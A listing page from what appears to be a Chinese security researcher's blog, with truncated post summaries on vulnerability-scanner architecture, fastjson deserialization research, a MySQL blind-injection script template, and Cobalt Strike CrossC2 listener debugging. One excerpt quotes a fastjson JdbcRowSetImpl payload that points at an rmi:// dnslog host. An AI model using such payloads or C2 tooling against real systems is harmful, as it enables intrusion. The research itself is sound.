摘要: 0X01 前言 转载请标明来源:https://www.cnblogs.com/huim/ 当项目功能逐渐成熟,同时需要实现的是运营流程和指标体系建设。需要工程化的功能逐渐少了,剩下的主要工作转变成持续运营以及功能迭代优化。 个人认为,项目应该以运营为目的推动工程化。至少,安全和开发的需求五五开,分 阅读全文
posted @ 2022-06-27 03:52 huim 阅读(112) 评论(0) 推荐(0) 编辑
摘要: 自动化漏洞扫描器引擎架构演变 阅读全文
posted @ 2022-06-26 20:54 huim 阅读(109) 评论(0) 推荐(0) 编辑
摘要: 0X01 前言 大多数安全产品的大致框架 提高性能的目的是消费跟得上生产,不至于堆积,留有余力应对突增的流量,可以从以下几个方面考虑 流量:减少无效流量 规则:减少规则冗余请求 生产者:减少无效扫描任务 引擎:灵活扩缩容的分布式引擎节点 0X02 减少无效流量 2.1 URL 2.1.1 去重——去 阅读全文
posted @ 2022-06-22 00:37 huim 阅读(147) 评论(0) 推荐(1) 编辑
摘要: 漏洞扫描器无害化篇 阅读全文
posted @ 2022-06-14 23:33 huim 阅读(103) 评论(0) 推荐(1) 编辑
摘要: 黑盒漏洞扫描器之检测规则 阅读全文
posted @ 2022-06-07 10:26 huim 阅读(136) 评论(0) 推荐(0) 编辑
摘要: 扫描器已经接触了三年,目前比较成熟,在这个方向里,遇到过很多问题,各种方案或多或少接触过。大多数安全产品都可以用流量+规则+引擎+处置来抽象框架,DAST也是这样。而功能,用目的划分,个人拙见主要5个:流量全、规则全、引擎高性能高可用、扫描无害化、运营高效化。这个系列主要是对应功能的描述。 DAST 阅读全文
posted @ 2022-05-24 00:05 huim 阅读(102) 评论(0) 推荐(0) 编辑
摘要: 页面键盘直接打 thisisunsafe 总是忘记输入的内容 阅读全文
posted @ 2022-03-22 10:21 huim 阅读(9) 评论(0) 推荐(0) 编辑
摘要: 问题:多次生成CrossC2,链接混乱了,导致多次调试 链接内容未开孔 瞅了瞅代码,cs linux CrossC2使用时,来回 "Create CrossC2 Listener",会导致链接混乱。 在生成第一个CrossC2 链接后( https://服务端IP:55413/10位hash),生成 阅读全文
posted @ 2022-03-13 23:23 huim 阅读(16) 评论(0) 推荐(0) 编辑
摘要: 0X01 fastjson 1.2.47 到 1.2.48做了什么改变 一步步跟进,找到不同的地方 fastjson/serializer/MiscCodec.class中 1.2.47 1.2.48 多了个参数 cache=false fastjson/util/TypeUtils.class c 阅读全文
posted @ 2021-12-09 12:52 huim 阅读(140) 评论(0) 推荐(0) 编辑
摘要: 0X01 fastjson 1.2.25修了什么 用1.2.24的payload打一遍,autotype被拦截 "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://3333.y7jjlyzz.dnslog. 阅读全文
posted @ 2021-12-06 15:46 huim 阅读(277) 评论(0) 推荐(0) 编辑
摘要: 一 环境 mac M1 java version "1.7.0_21" jdk下载地址 https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html 二 pom <?xml version="1.0" e 阅读全文
posted @ 2021-11-08 19:46 huim 阅读(169) 评论(0) 推荐(0) 编辑
摘要: 项目进度 [okr] okr,从国庆前一周,到十月二十几号,定完。 评审期间,各种需求、方案、可行性分析的敲定,也基本按照预料中的排期走。 理论上OKR没定完,就没有要做的事也没有排期。 但OKR制定和评审的流程也挺长,真等到OKR都评审完了,可能一个月就过去了。 所以把各种需求和方案也算到产品的排 阅读全文
posted @ 2021-11-01 17:40 huim 阅读(23) 评论(0) 推荐(0) 编辑
摘要: 扫描器竞品分析 持续一个季度的扫描器竞品分析 写了万字长文后,把报告的框架抽出来一下 ​(写大型文档先用思维导图把框架和大纲整理出来吧) 0X01 竞品分析描述 竞品分析的维度、对象 本次分析从产品概况、产品功能、产品检测能力三个维度对XX等N款漏洞扫描系统(服务)进行分析各自的优缺点 0X02 竞 阅读全文
posted @ 2021-10-11 19:52 huim 阅读(123) 评论(0) 推荐(0) 编辑
摘要: 几次mysql盲注中抽出来的盲注模板 import requests import time time_conf = 1 results = "" for i in range(1, 40): min_char_index = 1 # 当前字符最小ASCII large_char_index = 2 阅读全文
posted @ 2021-09-17 10:28 huim 阅读(20) 评论(0) 推荐(0) 编辑
摘要: 想计算flink udf发起请求的qps,写了个简单的gin package main import ( "bufio" "fmt" "github.com/gin-gonic/gin" "net/http" "os" "strconv" "time" ) var QpsCount = 0 var 阅读全文
posted @ 2021-08-19 12:15 huim 阅读(230) 评论(0) 推荐(0) 编辑
摘要: 正则匹配 // 正则匹配 String line = "example.com/dynamic/infocheck"; String pattern = "/dynamic/infocheck"; Pattern r = Pattern.compile(pattern); // 方法一 Matche 阅读全文
posted @ 2021-08-19 11:11 huim 阅读(22) 评论(0) 推荐(0) 编辑
摘要: export GO111MODULE=off export CGO_ENABLED=0 export GOOS=linux export GOARCH=amd64 go build main.go 阅读全文
posted @ 2021-06-22 20:31 huim 阅读(211) 评论(0) 推荐(0) 编辑
摘要: FROM_UNIXTIME(TIME / 1000000, 'yyyy-MM-dd''T''HH:mm:ss'), 阅读全文
posted @ 2021-06-22 20:27 huim 阅读(1482) 评论(0) 推荐(0) 编辑
摘要: # apache yum install -y httpd # php yum -y install php yum -y install php-gd php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-snmp php-s 阅读全文
posted @ 2021-06-22 20:16 huim 阅读(52) 评论(0) 推荐(0) 编辑
摘要: 一直用windows的git-gui比较习惯,用来提交前看修改了哪些代码,作检查。 mac上git没有找到自带的git。 # 创建个目录放文件 cd /opt sudo mkdir tools sudo chown -R $(whoami) tools cd tools # 下载安装 git clo 阅读全文
posted @ 2021-06-22 20:10 huim 阅读(1176) 评论(0) 推荐(0) 编辑